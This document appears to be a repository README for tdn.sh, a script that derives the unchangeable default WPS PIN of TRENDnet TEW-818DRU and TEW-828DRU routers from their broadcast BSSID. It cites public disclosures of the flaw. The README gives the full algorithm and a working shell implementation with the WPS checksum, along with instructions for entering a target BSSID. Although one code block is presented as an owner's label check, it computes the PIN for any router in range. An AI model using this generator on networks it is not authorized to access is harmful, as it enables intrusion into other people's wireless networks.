The TEW-828DRU is the most recent model from TRENDnet. It is an expensive tri-band device that can reach 3200 Mbps (cumulative).
The TEW-818DRU was launched just before the 828. It is an expensive device too, with "abgn" dual-band technology. It can reach 1900 Mbps.
The default WPS PIN for both models is generated from the last six digits of the 2.4 GHz BSSID (which are equal to the last six digits of the 5 GHz BSSID minus 4).
The first two digits of this portion of the BSSID are swapped with the last two digits.
Then the string is converted from hexadecimal to decimal.
Zero-padding is applied to get a 7-digit string if the value obtained after conversion to decimal is below 1000000. If the value after conversion is above 9999999, the first digit is removed.
In the end the string is always 7 decimal digits long, so that a WPS checksum can be generated properly and appended to create an 8-digit WPS PIN.
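As an added example (not the repository's `tdn.sh` and not code from the disclosures), the derivation above written as POSIX shell functions, so that an owner can confirm whether the PIN printed on a device label is the one derivable from the BSSID. It assumes that "inverted" means the first and last hex pairs trade places and that the checksum is the standard WPS one; the function names and the sample BSSID are constructed for illustration.

```shell
#!/bin/sh
# Added example (not tdn.sh): check whether the WPS PIN on a device label is
# the one derivable from its 2.4 GHz BSSID, following the steps above.

# Standard WPS checksum digit for a 7-digit value (weights 3,1,3,1,3,1,3).
wps_checksum() {
    n=$1; acc=0; w=3; i=0
    while [ "$i" -lt 7 ]; do
        acc=$((acc + w * (n % 10)))   # weigh the current last digit
        n=$((n / 10)); w=$((4 - w)); i=$((i + 1))
    done
    echo $(( (10 - acc % 10) % 10 ))
}

# Print the 8-digit default PIN for a BSSID, or return 1 on malformed input.
default_wps_pin() {
    hex=$(printf '%s' "$1" | tr -d ':' | tr 'a-f' 'A-F')
    case $hex in *[!0-9A-F]*) return 1 ;; esac
    [ "${#hex}" -eq 12 ] || return 1
    first=$(printf '%s' "$hex" | cut -c7-8)
    mid=$(printf '%s' "$hex" | cut -c9-10)
    last=$(printf '%s' "$hex" | cut -c11-12)
    # Assumption: "inverted" means the first and last pairs trade places.
    n=$((0x$last$mid$first))
    # Max is 0xFFFFFF = 16777215, so dropping the leading digit of an
    # 8-digit value is the same as reducing modulo 10^7.
    n=$((n % 10000000))
    printf '%07d%d\n' "$n" "$(wps_checksum "$n")"
}

# Succeeds when the PIN read from the label equals the derived one.
label_pin_is_derivable() {
    pin=$(default_wps_pin "$1") || return 1
    [ "$pin" = "$2" ]
}

# Constructed sample BSSID and PIN, not taken from a real device.
if label_pin_is_derivable "00:11:22:33:44:55" "55880190"; then
    echo "label PIN can be derived from the BSSID"
fi
```

The modulo step covers both length cases from the description: values below 1000000 are zero-padded by `printf`, and values above 9999999 lose their leading digit.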
Three more points should be noted:
- WPS is enabled by default
- There is a single default PIN: it is the same for the 2.4 GHz and 5 GHz networks
- The default PIN is not configurable: it cannot be changed
For more details, please check the original full disclosures:
- https://packetstormsecurity.com/files/132477/TRENDnet-TEW-818RDU-PIN-Disclosure.html (English) *
- https://www.wifi-libre.com/topic-160-algoritmo-pin-tew-818dru-ac1900-y-tew-828dru-ac3200-de-trendnet.html (Spanish)
- https://www.crack-wifi.com/forum/topic-10657-trendnet-tew-818dru-ac19000-full-disclosure-wps-pin.html (French)
(*) There is an error in the English version: the models are not TEW-818DRU v1 and v2 but, as stated here, TEW-818DRU & TEW-828DRU.
It is a very simple bash script that can be run on any GNU/Linux distribution. No dependencies are needed:
- download and unzip this repository branch
- open a shell in the unzipped directory with `cd`
- launch the script by invoking bash: `bash tdn.sh`
- enter (as prompted in the shell) the full 2.4 GHz BSSID in its original format (6 pairs of hexadecimal digits separated by colons ":")